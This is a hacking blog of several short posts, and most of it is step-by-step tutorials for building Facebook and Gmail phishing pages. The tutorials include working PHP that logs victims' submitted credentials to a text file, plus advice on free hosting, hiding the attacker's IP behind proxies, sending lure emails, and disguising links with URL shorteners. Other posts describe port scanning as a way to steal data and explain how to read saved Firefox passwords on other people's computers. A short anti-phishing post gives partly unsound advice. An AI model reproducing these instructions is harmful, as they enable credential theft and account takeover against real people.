How to Hack Facebook Account Using Phising webPage

BTS' readers used to ask me how to hack Facebook accounts.  Most of the people curious to know how hackers take control of their accounts.  In this post, let me clarify those doubts.

Here, i am going to explain one of the popular social engineering attack(luring user to do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how to create a facebook phishing page.

Step 1:
Go to facebook and right click on website .  Select "View source" and copy the code to notepad.


Step2:
Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:

Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "login.php"

Step 4:

Open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.

Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url. 

Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.

Note:
The above article is for educational purpose only, written for beginners of Ethical hacking or Pentesting to understand the basics so that it will be easy for them to understanding advanced topics.

I've also written an article that gives few security tips to protect yourself from being victim of such kind of phishing pages.  Here you can find it: How to prevent from Phishing Web page?

Publisher: Unknown - 00:19

How to Prevent from the Phishing Web page using Domain name?

Hi friends, in my last post i guide you to create a phishing web page using original Domain Name.  That post is for Attackers.  Here this post is for you victim.  If you don't like to become a victim of this Phishing web page, then you should read this post.

 Oh..!! i am sorry attackers. I must guide to the victim also.

Tips to Prevent:

Viewing SSL certificate:

•  Always check the url whether it is secure connection or not.  "https://" means secure connection.  "http://" means usual connection. 
•   Use Secure connection.
•  You should check the SSL certificate. How to check the certificate. visit the website. You can see the website favicon icon in browser in address bar. click the favicon icon.
• It will show small box
• Click the More information.
• Now the small modaless window will be opened.
• You can see "view certificates". Click it and verify whether it is original or not.
• If you are not able to find the "view certificates" ,then you visit wrong website or you are in non-secure connection.
• Note some website doesn't have the SSL certificate, so we can't access the website using secure connection(i mean https://).
• use gmail using secure connection, i means using https://gmail.com

Another Way:
Know what is the IP address of your domain.
Open the notepad enter your domain name and ip address as like this:
Domain name         xxx.xxx.xxx.xxx
Then save the file.
Whenever you want to visit the site, open the file and copy the IP address of domain name.
Paste the IP address into browser and hit enter.
If you do like this, you can visit the site directly.
Actually domain name connects to associated ip address but we are directly using IP address. So we won't redirected to any other phishing web page.
It might look bore to do.
But if you did this ,you can prevent your account lost.

Publisher: Unknown - 00:17

How to create fake or Phishing web page for gmail

 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:

Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:
Now you need to create login.php
 so you need to open the notepad and type as

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.

Publisher: Unknown - 00:10

What is Database and MY SQL Injections

In this i'll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.

What is the Database?
  Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties.


Database is a place that stores username,passwords and more details.  Database should be secured.  But providing high level security is not possible for all sites(much costlier or poor programming ). So Database of many websites is insecure or vulnerable(easily hackable).

Some List of Database are:

• DB servers,
• MySQL(Open source), 
• MSSQL, 
• MS-ACCESS, 
• Oracle, 
• Postgre SQL(open source), 
• SQLite,

 What is SQL injection?
      SQL injection is Common and famous method of hacking  at present .  Using this method an unauthorized person can access the database of the website.  Attacker can get all details from the Database.

What an attacker can do?

• ByPassing Logins
• Accessing secret data
• Modifying contents of website
• Shutting down the My SQL server

Publisher: Unknown - 00:00

What is Port Scanner? what is the use?

In my last post i gave you the list of best port scanner tools. In this post i will explain about port scanning process and use of port scanning.

Port Scanning:
Port scanning is the process of searching for active or opened ports in victim system. Just like a thief searching for gate opened house. Consider this scanning



Starting Scan.

Target Host: www.yourcompany.com or IP Address

TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.


It shows the active ports in that domain or ip address


What is the Use?
what we can do with these ports? we can communicate with the victim system remotely using those active ports. So we can get their data without their knowledge.(The thing is that you can theft their data).


Scanning for open ports is done in two ways.

• Scan a single IP address for open ports:
  It just like a thief who searching for any opened gate in single house.
  In relation to scanning, the gate is port and house is IP address.
  We are searching for the active port in a single IP address
  Eg:
  searching for active ports only at 123.xx.xx.xx
  
• Scan a range of IP address to find open ports:
  Scanning a range of IP address is like thief who searching for any opened gate in a street. In relation to scanning, the gate is ports and street is range of ip address
  
  Eg:
  searching active ports only at
  123.20.xx.xx to 123.30.xx.xx
  

Port Scanning Tools

Publisher: Unknown - 23:58

Some of Best Port Scanning Tools AMANAHAD

What is  port Scanning?
      You should understand what is port scanning .  Port scanning is the process of checking which port is opened and which ports are locked.  Just like a thief who searching for a gate opened house.

What is the Use?
   By finding which port is opened ,you can try to communicate with victim system remotely and access their data .   

Learn more about Port scanning.

EG:-

* 21: FTP
* 22: SSH
* 23: Telnet
* 53: Domain Name System
* 80: World Wide Web HTTP
* 119: Network News Transfer Protocol
* 443: HTTP over Transport Layer Security/Secure Sockets Layer
* 445: microsoft-ds, Server Message Block over TCP


If these ports are not secure a hacker can communicate with these ports and cause havoc
The list given below are some of the best port scanners
You can download from the links given below:
Nmap:
This tool developed by Fyodor is one of the best unix and windows based port scanners. This
advanced port scanner has a number of useful arguments that gives user a lot of control over the
process.
From:

   Insecure.org

Download:

  http://nmap.org/download.html

Superscan
A Windows-only port scanner, pinger, and resolver SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.
From

  http://www.foundstone.com/

Download

  http://www.foundstone.com/us/resources/proddesc/superscan4.html

Angry IP Scanner
A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic
host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.

From

  http://www.angryziber.com/

Download

   http://www.angryziber.com/w/Download

Unicornscan :
Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering
and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses.

From

  http://www.unicornscan.org/

Download

   http://www.unicornscan.org/

Publisher: Unknown - 23:57

C program and how to compile it.

 

Hackers should atleast 5 programming languages.  Before all ,learn c program .

Because it is basic programming language for all programming language.   It is easy to learn also. 

There are many books available to read like Complete reference c, C for dummies. 

In online also you can learn.  One of best website to learn c program is www.cprogramming.com/

How to compile c program?
Download "Turbo c " compiler and install. it.  :download

Now open the tc.exe in the folder "c:\tc\bin"

Select New in File Menu of the turbo c editor.

and type your coding .

save it with ".c" extension Like hello.c

compile:
press alt+f9

Create exe file:
press f9

Run :
ctrl+f9
A-@-A
if my post is not clear for you ask me doubts as comment 

Publisher: Unknown - 23:56

How to see saved password in Mozilla firefox AMANAHAD

This is not hacking article(not at all).  However, i would say it is kind of trick that most of us not aware of.  Using this trick, you can just view the "saved passwords" in the mozilla firefox.

You remember the "Remember password" which will be asked by Firefox whenever you successfully logged into a website?! If someone accept it, then the password will be stored locally in the firefox.  What we are going to do is get that password.

Let's say you are visiting a public Internet cafe or your friend's system , you can just the follow the following steps and view the saved passwords.

Steps:

• click the "Tools" option in menu bar.
• Select "Options"
• It will open the small window, now you just have to Select the "security" tab
• There, you can see the "saved Passwords" button

• Once you clicked the button, it will popup another small window.
• It will provide the list of sites with usernames
• Select any particular site and click the "show Password"
• Yes, now you can view the password :)

Hope you enjoyed this article. .......... A-@-A

like us now...

facebook 

Publisher: Unknown - 23:42